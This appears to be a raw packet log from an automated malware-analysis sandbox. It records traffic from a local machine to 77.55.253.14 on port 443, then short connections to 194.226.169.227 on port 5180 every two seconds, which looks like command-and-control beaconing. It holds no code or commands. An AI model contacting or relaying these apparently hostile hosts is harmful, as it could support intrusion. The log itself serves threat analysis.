                                            Dec 12, 2024 12:35:27.415330887 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.418442011 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.418551922 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.421741009 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.421829939 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.425067902 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.425168037 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.429291964 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.429373026 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.432555914 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.432642937 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.436295986 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.436372995 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.439604044 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.439687967 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.442955017 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.443034887 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.447057962 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.447139978 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.450409889 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.450488091 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.453665018 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.453826904 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.516490936 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.516604900 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.595227957 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.595361948 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.597913027 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.598021030 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.600660086 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.600749969 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.603997946 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.604072094 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.606708050 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.606807947 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.609358072 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.609436035 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.612737894 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.612808943 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.615377903 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.615449905 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.618206024 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.618278980 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.621135950 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.621301889 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.623893023 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.623995066 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.626580954 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.626792908 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.629898071 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.629981995 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.632647038 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.632741928 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.635406971 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.635524988 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.707659960 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.707768917 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.787141085 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.787276983 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.789591074 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.789716959 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.792727947 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.792855024 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.795264006 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.795367002 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.797698975 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.797789097 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.800832987 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.800960064 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.803339958 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.803423882 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.805910110 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.806015015 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.808356047 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.808423996 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.811520100 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.811599970 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.813659906 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.813751936 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.816947937 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.817043066 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.819444895 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.819531918 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.821901083 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.821980000 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.825067997 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.825169086 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.899424076 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.899516106 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.979290009 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.979381084 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.981085062 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.981163979 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.983654976 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.983736992 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.986862898 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.986943960 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.989295006 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.989362955 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.991820097 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.991955996 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.994330883 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.994406939 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.997498989 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.997584105 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.999912977 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.000001907 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.002580881 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.002650976 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.005227089 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.005306959 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.007834911 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.007924080 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.011137009 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.011209965 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.013453007 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.013523102 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.015990973 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.016072989 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.018702984 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.018783092 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.092694998 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.092791080 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.172466040 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.172569990 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.175345898 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.175429106 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.177908897 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.177989006 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.180358887 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.180425882 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.183547020 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.183626890 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.186032057 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.186142921 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.188550949 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.188625097 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.191020012 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.191097021 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.194258928 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.194351912 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.196657896 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.196727991 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.199522018 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.199598074 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.202060938 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.202131033 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.204521894 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.204596996 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.207686901 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.207758904 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.210148096 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.210226059 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.284390926 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.284518003 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.364042044 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.364151955 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.366636038 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.366731882 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.369704008 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.369787931 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.372243881 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.372337103 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.374686003 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.374778032 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.377294064 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.377398014 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.379740953 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.379837036 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.382863045 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.382978916 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.385375977 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.385708094 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.387931108 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.388016939 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.390639067 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.390724897 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.393136978 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.393215895 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.396301031 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.396380901 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.398753881 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.398834944 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.401339054 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.401422024 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.476403952 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.476495028 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.556116104 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.556308031 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.557884932 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.557960987 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.560524940 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.560604095 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.562885046 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.562982082 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.566026926 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.566096067 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.568638086 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.568730116 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.571011066 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.571082115 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.574232101 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.574306965 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.576697111 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.576801062 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.579263926 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.579354048 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.581746101 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.581855059 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.584604025 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.584691048 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.587101936 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.587181091 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.590154886 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.590248108 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.592562914 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.592638016 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.595146894 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.595283031 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.669801950 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.669934988 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.749387026 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.749588966 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.751789093 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.751861095 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.754215956 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.754291058 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.757324934 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.757401943 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.759788036 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.759855032 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.759875059 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.759892941 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:28.759936094 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:28.763628960 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:51.558063030 CET497055180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:51.677947044 CET518049705194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:35:51.678041935 CET497055180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:51.689788103 CET497055180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:51.809602976 CET518049705194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:35:51.809684038 CET497055180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:51.929656982 CET518049705194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:35:53.865410089 CET518049705194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:35:53.865566015 CET497055180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:53.866250992 CET497055180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:53.867150068 CET497065180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:53.986114025 CET518049705194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:35:53.986876965 CET518049706194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:35:53.986975908 CET497065180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:53.987816095 CET497065180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:54.107743979 CET518049706194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:35:54.107889891 CET497065180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:54.227777958 CET518049706194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:35:56.158428907 CET518049706194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:35:56.158613920 CET497065180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:56.158760071 CET497065180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:56.159744024 CET497075180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:56.279232025 CET518049706194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:35:56.280035019 CET518049707194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:35:56.280153990 CET497075180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:56.281023026 CET497075180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:56.400727987 CET518049707194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:35:56.400794983 CET497075180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:56.520665884 CET518049707194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:35:58.459041119 CET518049707194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:35:58.459126949 CET497075180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:58.459250927 CET497075180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:58.460109949 CET497085180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:58.579229116 CET518049707194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:35:58.580017090 CET518049708194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:35:58.580113888 CET497085180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:58.580944061 CET497085180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:58.700814009 CET518049708194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:35:58.700901985 CET497085180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:35:58.820820093 CET518049708194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:00.759407043 CET518049708194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:00.759615898 CET497085180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:00.759720087 CET497085180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:00.760617971 CET497105180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:00.879977942 CET518049708194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:00.881138086 CET518049710194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:00.881241083 CET497105180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:00.882136106 CET497105180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:01.002552986 CET518049710194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:01.002645969 CET497105180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:01.122956991 CET518049710194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:03.068236113 CET518049710194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:03.068388939 CET497105180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:03.068487883 CET497105180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:03.069389105 CET497115180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:03.188446045 CET518049710194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:03.189275980 CET518049711194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:03.189363956 CET497115180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:03.190220118 CET497115180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:03.309998989 CET518049711194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:03.310060978 CET497115180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:03.430010080 CET518049711194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:05.380790949 CET518049711194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:05.380903959 CET497115180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:05.381028891 CET497115180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:05.381993055 CET497125180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:05.501413107 CET518049711194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:05.501965046 CET518049712194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:05.502060890 CET497125180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:05.502908945 CET497125180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:05.622863054 CET518049712194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:05.622946024 CET497125180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:05.743223906 CET518049712194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:07.673988104 CET518049712194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:07.674105883 CET497125180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:07.674253941 CET497125180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:07.675256014 CET497135180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:07.793898106 CET518049712194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:07.794934988 CET518049713194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:07.795075893 CET497135180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:07.795928955 CET497135180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:07.915621042 CET518049713194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:07.915697098 CET497135180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:08.035590887 CET518049713194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:09.971091986 CET518049713194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:09.971224070 CET497135180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:09.971394062 CET497135180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:09.972429991 CET497145180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:10.092722893 CET518049713194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:10.093521118 CET518049714194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:10.093672991 CET497145180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:10.094561100 CET497145180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:10.214346886 CET518049714194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:10.214478970 CET497145180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:10.334328890 CET518049714194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:12.287050962 CET518049714194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:12.287173986 CET497145180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:12.287337065 CET497145180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:12.288337946 CET497155180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:12.407227993 CET518049714194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:12.408107996 CET518049715194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:12.408198118 CET497155180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:12.409080982 CET497155180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:12.528825998 CET518049715194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:12.528903961 CET497155180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:12.648746967 CET518049715194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:14.581865072 CET518049715194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:14.582072973 CET497155180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:14.582214117 CET497155180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:14.583357096 CET497165180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:14.704082966 CET518049715194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:14.705080032 CET518049716194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:14.705312967 CET497165180192.168.2.16194.226.169.227
